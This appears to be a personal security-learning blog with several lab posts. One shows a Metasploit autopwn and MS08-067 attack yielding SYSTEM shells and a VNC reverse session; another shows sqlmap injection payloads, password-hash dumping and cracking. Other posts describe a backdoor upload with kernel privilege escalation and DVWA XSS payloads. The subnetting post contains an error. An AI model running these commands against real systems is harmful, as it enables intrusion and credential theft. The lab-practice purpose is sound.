Play Metasploit db_autopwn on Windows XP SP2 "Abal-Abal"
Manusia Tak Sempurna

msf > db_status
[*] postgresql connected to msf3
msf > hosts
Hosts                                                                                                                                                                                        
=====                                                                                                                                                                                                                                                                                                                                                                             
address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > db_nmap 192.168.56.101
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-09-30 07:49 WIT
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 3389/tcp open  ms-term-serv
[*] Nmap: MAC Address: 08:00:27:2B:15:80 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.56.101  08:00:27:2B:15:80                                                


msf > db_autopwn -p -t -e
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] =========================================================================
[*]                             Matching Exploit Modules
[*] =========================================================================
[*]   192.168.56.101:135  exploit/windows/dcerpc/ms03_026_dcom  (port match)
[*]   192.168.56.101:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.56.101:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.56.101:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.56.101:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.56.101:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.56.101:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms04_031_netdde  (port match)
----------------------------------cut here------------------------------------------
 (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.56.101:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.56.101:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.56.101:139...
[*] (4/51 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (5/51 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.56.101:139...
[*] (6/51 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.56.101:139...
[*] (7/51 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.56.101:139...
[*] (8/51 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.56.101:139...
[*] (9/51 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (10/51 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.56.101:139...
[*] (11/51 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.56.101:139...
[*] (12/51 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.56.101:139...
[*] (13/51 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.56.101:139...
[*] (14/51 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.56.101:139...
[*] (15/51 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.56.101:139...
[*] (16/51 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.56.101:139...
[*] (17/51 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.56.101:139...
[*] (18/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.56.101:139...
[*] (19/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.56.101:139...
[*] (20/51 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.56.101:139...
[*] (21/51 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.56.101:139...
[*] (22/51 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.56.101:139...
[*] (23/51 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.56.101:139...
[*] (24/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:139...
[*] (25/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:139...
[*] (26/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:139...
----------------------------------cut here------------------------------------------
 (49/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:445...
[*] (50/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Waiting on 38 launched modules to finish execution...
[*] (51/51 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.56.1:49973 -> 192.168.56.101:20907) at 2011-09-30 07:51:35 +0700
[*] (51/51 [1 sessions]): Waiting on 11 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.56.1:58149 -> 192.168.56.101:33496) at 2011-09-30 07:51:37 +0700
[*] (51/51 [2 sessions]): Waiting on 7 launched modules to finish execution...
[*] (51/51 [2 sessions]): Waiting on 6 launched modules to finish execution...

Active sessions
===============

  Id  Type                   Information                     Connection                                  Via
  --  ----                   -----------                     ----------                                  ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:49973 -> 192.168.56.101:20907  exploit/windows/smb/ms08_067_netapi
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:58149 -> 192.168.56.101:33496  exploit/windows/smb/ms08_067_netapi

[*] =========================================================================
msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

do whatever you want!!!


OR TRY THIS
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.

VNC Viewer Free Edition 4.1.1 for X - built Apr  9 2010 15:52:37
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
msf  exploit(ms08_067_netapi) >
Fri Sep 30 08:14:30 2011
 CConn:       connected to host 127.0.0.1 port 5900

Fri Sep 30 08:14:31 2011
 CConnection: Server supports RFB protocol version 3.8
 CConnection: Using RFB protocol version 3.8
 TXImage:     Using default colormap and visual, TrueColor, depth 24.
 CConn:       Using pixel format depth 6 (8bpp) rgb222
 CConn:       Using ZRLE encoding
 CConn:       Throughput 3781 kbit/s - changing to hextile encoding
 CConn:       Throughput 3781 kbit/s - changing to full colour
 CConn:       Using pixel format depth 24 (32bpp) little-endian rgb888
 CConn:       Using hextile encoding

Fri Sep 30 08:14:32 2011
 CConn:       Throughput 20000 kbit/s - changing to raw encoding
 CConn:       Using raw encoding




now you can control the windows on your on.....:p



0 comments | | edit post
Create Backdoor From MySQL
Manusia Tak Sempurna

I scan with sqlmap and this is the syntax

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58

and the I try to search for a username and password from the database with sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'                                                                                                                                              
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'                                                                                                                                        
database management system users password hashes:                                                                                                                                            
[*] debian-sys-maint [1]:
    password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [2]:
    password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55

Then I try to connect from sqlmap tp to the shell of mysql

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But seems it can't connect

to be continued................

0 comments | | edit post
Server Exploit
Manusia Tak Sempurna
To exploit a server I use scanner to know the aplication running on the system, after I scan i got the result but the aplication is the latest version show I can break the system over the aplication.

Then I just exploring the web menu to menu on the web. I find a vulner on the upload file on the web. I just test to upload some picture to the web and it success, i try try to upload some file with extension .txt and it success to. Maybe the developer web is not sanitaze the file can be upload.

Then I just upload a backdoor that I have prepared, I just upload the backdoor to the web and it succesfully uploaded. Now i search where the file has been upload and i found it. After i running the backdoor  i try to exploit the kernel on the system. I search the exploit kernel and i found it I just upload the exploit kernel under the backdoor on the web.

After that i just run the exploit on the kernel to gained the full access as root and it is work. Now I have full access to the system.
0 comments | | edit post
SOCKS
Manusia Tak Sempurna

SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations.
Multiple versions of the SOCKS protocol exist including SOCKS v4 and SOCKS v5. SOCKS v4 uses TCP as a transport, while SOCKS v5 also supports UDP. The base SOCKS v5 specification is RFC 1928 with additional details captured in RFC 1929 and RFC 1961.

reference :


0 comments | | edit post
htaccess
Manusia Tak Sempurna
htaccess file is an ASCII text file located in the root directory is usually "public_html" isoften used to change the default settings of the web server used.
htaccess can be use to
- blocking specific ip address
- redirect old pages to the new pages
- preventing exploration to the directory
0 comments | | edit post
PHP Suhosin
Manusia Tak Sempurna
Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.

Feature List
Engine Protection (only with patch)

  • Protects the internal memory manager against bufferoverflows with Canary and SafeUnlink Protection
  • Protects Destructors of Zend Hashtables
  • Protects Destructors of Zend Linked-Lists
  • Protects the PHP core and extensions against format string vulnerabilities
  • Protects against errors in certain libc realpath() implementations

Misc Features
  • Protection Simulation mode
  • Adds the functions sha256() and sha256_file() to the PHP core
  • Adds support for CRYPT_BLOWFISH to crypt() on all platforms
  • Transparent protection of open phpinfo() pages
  • EXPERIMENTAL SQL database user protection

Runtime Protection
  • Transparent Cookie Encryption
  • Protects against different kinds of (Remote-)Include Vulnerabilities 
  • disallows Remote URL inclusion (optional: black-/whitelisting), disallows inclusiong of uploaded files, optionally stops directory traversal attacks
  • Allows disabling the preg_replace() /e modifier
  • Allows disabling eval()
  • Protects against infinite recursion through a configureabel maximum execution depth
  • Supports per Virtual Host / Directory configureable function black- and whitelists
  • Supports a separated function black- and whitelist for evaluated code
  • Protects against HTTP Response Splitting Vulnerabilities
  • Protects against scripts manipulating the memory_limit
  • Protects PHP‘s superglobals against extract() and import_request_vars()
  • Adds protection against newline attacks to mail()
  • Adds protection against \0 attack on preg_replace()

Session Protection
  • Transparent encryption of session data
  • Transparent session hijacking protection
  • Protection against overlong session identifiers
  • Protection against malicious chars in session identifiers
Filtering Features


  • Filters ASCIIZ characters from user input
  • Ignores GET, POST, COOKIE variables with the following names:

              GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST
              _SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS
              HTTP_GET_VARS, HTTP_POST_VARS, HTTP_POST_FILES
              HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS

  • Allows enforcing limits on REQUEST variables or separated by type (GET, POST, COOKIE)

             Supports a number of variables per request limit
             Supports a maximum length of variable names [with and without indicies]
             Supports a maximum length of array indicies
             Supports a maximum length of variable values
             Supports a maximum depth of arrays

  • Allows only a configureable number of uploaded files
  • Supports verification of uploaded files through an external script
  • Supports automatic banning of uploaded ELF executables
  • Supports automatic banning of uploaded binary files
  • Supports automatic stripping of binary content in uploaded files
  • Configureable action on violation

                     just block violating variables
                     send HTTP response code
                     redirect the browser
                     execute another PHP script

Logging Features

  • Supports multiple log devices (syslog, SAPI module error log, external logging script)
  • Supports freely configureable syslog facility and priority
  • Supports log device separated selection of alert types to log
  • Alerts contain filename and linenumber that triggered it
  • Alerts contain the IP address of the user triggering it
  • The IP Address can also be extracted from X-Forwarded-For HTTP headers (f.e. for reverse proxy setups)




0 comments | | edit post
Subnetting
Manusia Tak Sempurna

Subnetting is 32 bit binary numbers it can use to differentiate betwen network ID and host ID. It can be represent the location host, on local network or external network.



We often see in writing the ip address/computer addressing as follows 192.168.0.1/24.
/ 24 indicatesthat the network connection is divided into 256 or 254 client computers with an id and a host,subnet mask is 255.255.255.0 for this group and in this workgroup can be formed onlyone group that is only a start xxx.xxx.xxx.0 - xxx.xxx.xxx.256.

0 comments | | edit post
Bypass Client Side JS
Manusia Tak Sempurna

CASE

This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting. You must break all 7 validators at the same time.
picture

I try to input
picture

but it seems not succes it just make appear pop up
picture

so I try with burpsuite to change the variable on the box
picture

box 1
I just add ABC
box 2
I just add 456
box 3
I just add !@#
box 4
I just add 7
box 5
I just add 12345
box 6
I just add 1234567
box 7
I just add 9876

after I change the variable on the box then it's work. It can bypass on the client side.
picture



0 comments | | edit post
Install WebGoat
Manusia Tak Sempurna
Before we install WebGoat we need java you can download it in here
and if you want to download WebGoat you can download in here
After that you can extract the file with terminal


p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z


if you don't have p7zip you can download from terminal


apt-get install p7zip


Then if you want to make your dekstop clean you can move it inside /pentest/web/webgoat you can do it form terminal


mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat


now make /pentest/web/webgoat/webgoat.sh executable with

chmod +x /pentest/web/webgoat/webgoat.sh


Now you can run webgoat on port 80 or 8080 running

sh /pentest/web/webgoat/webgoat.sh start80 or sh /pentest/web/webgoat/webgoat.sh start8080

and to stop tomcat and webgoat use

sh /pentest/web/webgoat/webgoat.sh stop


Open up firefox and connect to http://127.0.0.1/webgoat/attack or http://127.0.0.1:8080/webgoat/attack according to the port you use to run tomcat. 



username : guest
password : guest



after that you can use WebGoat
0 comments | | edit post
Damn Vulnerable Web App (DVWA)
Manusia Tak Sempurna

DVWA is to practice or learn the vulnerablity web. In this application include :
Brute Force
Command Execution
CSRF
File Inclusion
SQL Injection
SQL Injection Blind
Upload
XSS Reflected
XSS Stored



XSS Reflected
I just try to XSS level low with this script :
<script>alert("XSS LOW")</script>
and the result is like in this picture


And then the next level is medium
In this level I just try with this script
<script language=javascript>alert("XSS Medium");</script>
and the result is like in the picture


The next level is high level
On this level I can't get the right script so I can't solved this level

Labels: 1 comments | | edit post
XSS Persistent and XSS Non - Persistent
Manusia Tak Sempurna

XSS Non - Persistent
The non-persistent(or reflected) cross-site scripting vulnerability is by far the most common type.These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.
Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection.A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.
A third-party attacker may easily place hidden frames or deceptive links to unrelated sites. They can cause victims' browsers to navigate to URLs on the vulnerable site automatically, say, to pick up their contact information—often completely in the background—and in such a case, the attacker can intrude into the security context that rightfully belonged to the victim.

XSS Persistent
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.
For example, say the Golden Orchid is a dating website. Members scan the profiles of other members if they look interesting. Meanwhile, everybody's real names and email are kept secret on the server. The only time a member's real name and email are in the browser are when the member is signed in, and they can't see anybody else's.
Say, a hacker Mallory is a member, and he wants to figure out the real names of the women he sees on the site. To do so, he writes a program that runs on the women's browsers when they visit hisprofile. It knows where to get the real name and info, because Mallory read how the Golden Orchid web pages work. It then sends a quick message to his own server, which collects all of this information while he's watching football.
To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal) but the text at the end of his answer is his program to steal names and emails. If it's enclosed in a <script> element, it won't show on the screen, it'll just run the program instead. So Alice is a member, sees the listing for Mallory. When she gets to the page with his answer to the First Date question, Mallory's program runs, steals a copy of Alice's real name, real email, address, and possibly even her password, directly from her machine, while she's visiting the dating website, and she never notices because there's very little to notice.
Persistent XSS can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of a client-side worm.
The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, etc.) that can be controlled by an attacker could become an injection vector.

Labels: 0 comments | | edit post
WEB SERVICES TESTING
Manusia Tak Sempurna
1. WS Information Gathering
The first step to perform a Web Service Test is to determine the WS entry points and the communication schema: this is
described in the WSDL associated with the WS.

2. Testing WSDL
Check the WSDL of the web service to find the entry points and try to invoke an operation that is not used in a standard SOAP Request. Ensure that the WS doesn’t give some confidential information

3. XML Structural Testing
